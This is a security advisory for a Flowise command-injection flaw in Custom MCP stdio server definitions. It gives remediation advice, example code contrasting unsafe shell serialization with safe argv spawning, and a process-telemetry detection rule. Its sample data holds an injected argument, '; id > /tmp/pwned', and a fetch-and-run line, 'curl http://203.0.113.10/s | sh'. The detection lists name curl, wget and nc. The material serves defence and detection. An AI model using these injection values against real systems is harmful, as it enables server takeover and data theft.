CVE-2026-40933

Flowise · Flowise

Flowise prior to 3.1.0 is vulnerable to OS command injection due to unsafe serialization of stdio commands in the MCP adapter, allowing authenticated attackers to execute arbitrary commands.

Executive summary

An OS command injection vulnerability in Flowise versions before 3.1.0 allows an authenticated attacker to execute arbitrary commands on the host running the Flowise service, with the privileges of the Flowise process.

Vulnerability

The vulnerability is in the "Custom MCP" configuration interface, where an authenticated user defines a stdio MCP server as a command plus a list of arguments. The MCP adapter serializes that command and its arguments unsafely before launching the server process, and the validation applied to the configuration is insufficient, so an attacker can supply argument values that pass the existing checks but are interpreted by the operating system as additional commands rather than as literal arguments.
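The following is an added illustration of the bug class the advisory describes, not Flowise's own code: a stdio MCP server configured as a command plus arguments, serialized into a single shell string on one side and kept as an argv array on the other. The names StdioServerConfig, serializeForShell, naiveCheck, planSpawn and the command allowlist are assumptions made for the example.

```typescript
// Added example of unsafe vs. safe handling of a stdio server command.
// Not Flowise code; all names and the allowlist are assumptions.

interface StdioServerConfig {
  command: string;
  args: string[];
}

// Unsafe serialization: command and arguments are flattened into one string
// that is later handed to a shell (child_process.exec, or spawn with
// shell: true). Once flattened, an argument containing ';', '|', '&&' or
// backticks is no longer an argument; the shell parses it as a new command.
function serializeForShell(cfg: StdioServerConfig): string {
  return [cfg.command, ...cfg.args].join(" ");
}

// Validation of the kind an attacker can bypass: it only inspects the
// command field and never looks at the arguments that get serialized with it.
function naiveCheck(cfg: StdioServerConfig): boolean {
  return !/[;&|`$]/.test(cfg.command);
}

// Hardened handling: keep argv as an array so each element reaches the child
// as exactly one token, never spawn through a shell, and only launch binaries
// from an explicit allowlist (the list below is an assumption for the example).
const ALLOWED_COMMANDS = new Set(["node", "npx", "uvx", "python3"]);

interface SpawnPlan {
  file: string;
  argv: string[];
  shell: false; // never true: shell: true reintroduces the injection
}

function planSpawn(cfg: StdioServerConfig): SpawnPlan {
  if (!ALLOWED_COMMANDS.has(cfg.command)) {
    throw new Error(`command not allowed: ${cfg.command}`);
  }
  for (const a of cfg.args) {
    // Arguments stay opaque strings; only reject what cannot be an argv token.
    if (typeof a !== "string" || a.includes("\0")) {
      throw new Error("invalid argument");
    }
  }
  // The caller hands this to child_process.spawn(plan.file, plan.argv, { shell: false }).
  return { file: cfg.command, argv: [...cfg.args], shell: false };
}

// Constructed attacker-controlled configuration: the command field is clean,
// the payload is hidden in the last argument.
const MALICIOUS_CONFIG: StdioServerConfig = {
  command: "npx",
  args: ["-y", "@example/mcp-server", "; id > /tmp/pwned"],
};
```

serializeForShell(MALICIOUS_CONFIG) yields "npx -y @example/mcp-server ; id > /tmp/pwned", which a shell runs as two commands, and naiveCheck lets the configuration through. planSpawn keeps "; id > /tmp/pwned" as a single literal argv element that the child receives unchanged. Note that allowlisting the launcher binary only constrains what Flowise itself executes; it does not constrain what the MCP server does once running, so the ability to create or edit Custom MCP nodes is the boundary that actually needs protecting.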

Business impact

Successful exploitation gives the attacker command execution with the privileges of the Flowise process. Where that process runs as root, or on a host or in a container that holds credentials, data volumes or routes into the internal network, this amounts to full control of the server, enabling data exfiltration, ransomware deployment, or complete system takeover. With a CVSS score of 9.9, this vulnerability represents a critical threat to the confidentiality, integrity, and availability of the host environment.

Remediation

Immediate Action: Upgrade Flowise to version 3.1.0 or later; this release addresses the command injection flaw.

Proactive Monitoring: Review process-creation telemetry (auditd, EDR, or container runtime logs) for child processes spawned under the Flowise service account that are not the expected MCP server launchers, in particular shells invoked with -c by the Flowise node process and download or network utilities such as curl, wget or nc.

Compensating Controls: Segment the network so the Flowise host cannot reach sensitive internal systems, run the service under a dedicated low-privilege account (preferably in a container with no unneeded mounts or credentials), and limit the ability to create or edit Custom MCP nodes to trusted administrators, since exploitation requires an authenticated user with access to that interface.
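As an added example for the monitoring recommendation above (not part of the advisory or of Flowise), the rule below scans process-creation events for the patterns a command injection through a Node.js process leaves behind. The event shape, the service account name "flowise", the baseline of expected launchers and the sample events are all constructed assumptions.

```typescript
// Added detection example; event format, account name and baselines are assumed.

interface ProcEvent {
  ts: string;
  user: string;        // account the new process runs as
  parentComm: string;  // executable name of the parent, as normalised by the agent
  comm: string;        // executable name of the new process
  argv: string[];
}

interface Finding {
  ts: string;
  reason: string;
  cmdline: string;
}

const FLOWISE_USER = "flowise";                                        // assumed service account
const EXPECTED_LAUNCHERS = new Set(["node", "npx", "uvx", "python3"]); // assumed baseline of MCP launchers
const SHELLS = new Set(["sh", "bash", "dash", "zsh"]);
const TOOLS = new Set(["curl", "wget", "nc", "ncat", "base64", "id", "whoami", "chmod"]);

function inspect(ev: ProcEvent): Finding | null {
  if (ev.user !== FLOWISE_USER) return null;
  const cmdline = ev.argv.join(" ");
  // Injection through exec() or spawn(..., { shell: true }) surfaces as the
  // node process starting a shell with -c and the attacker's string as its script.
  if (ev.parentComm === "node" && SHELLS.has(ev.comm) && ev.argv.includes("-c")) {
    return { ts: ev.ts, reason: "node spawned shell -c", cmdline };
  }
  // Follow-on activity from the injected shell: download, recon, exfiltration.
  if (TOOLS.has(ev.comm)) {
    return { ts: ev.ts, reason: `recon/exfil tool ${ev.comm}`, cmdline };
  }
  // Anything else the service account starts that is not a known launcher.
  if (!EXPECTED_LAUNCHERS.has(ev.comm) && !SHELLS.has(ev.comm)) {
    return { ts: ev.ts, reason: `unexpected binary ${ev.comm}`, cmdline };
  }
  return null;
}

function scan(events: ProcEvent[]): Finding[] {
  const out: Finding[] = [];
  for (const ev of events) {
    const f = inspect(ev);
    if (f) out.push(f);
  }
  return out;
}

// Constructed sample events; not real telemetry.
const SAMPLE_EVENTS: ProcEvent[] = [
  // Flowise starting an expected stdio MCP server
  { ts: "2026-01-01T10:00:00Z", user: "flowise", parentComm: "node", comm: "npx",
    argv: ["npx", "-y", "@example/mcp-server"] },
  // the server process itself
  { ts: "2026-01-01T10:00:01Z", user: "flowise", parentComm: "npx", comm: "node",
    argv: ["node", "/app/node_modules/.bin/mcp-server"] },
  // injection: node spawns a shell whose -c script carries the payload
  { ts: "2026-01-01T10:05:00Z", user: "flowise", parentComm: "node", comm: "sh",
    argv: ["sh", "-c", "npx -y @example/mcp-server ; curl http://203.0.113.10/s | sh"] },
  // follow-on download by the injected shell
  { ts: "2026-01-01T10:05:01Z", user: "flowise", parentComm: "sh", comm: "curl",
    argv: ["curl", "http://203.0.113.10/s"] },
  // a different account; out of scope for this rule
  { ts: "2026-01-01T10:06:00Z", user: "root", parentComm: "bash", comm: "sh",
    argv: ["sh", "-c", "ls"] },
];
```

Running scan(SAMPLE_EVENTS) flags the shell -c event and the curl event and ignores the two legitimate launcher events and the root-owned one. Expect false positives from npm lifecycle scripts and from MCP servers that legitimately spawn shells; tune EXPECTED_LAUNCHERS to the servers actually deployed, and correlate hits with Flowise's own record of who created or edited the Custom MCP node around the same time.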

Exploitation status

Public Exploit Available: Unknown

Analyst recommendation

This vulnerability presents a severe risk to infrastructure integrity. Administrators should apply the 3.1.0 update immediately and then review the stored Custom MCP node configurations, including the command and argument values of each node, so that any malicious server definition added before the patch is found and removed.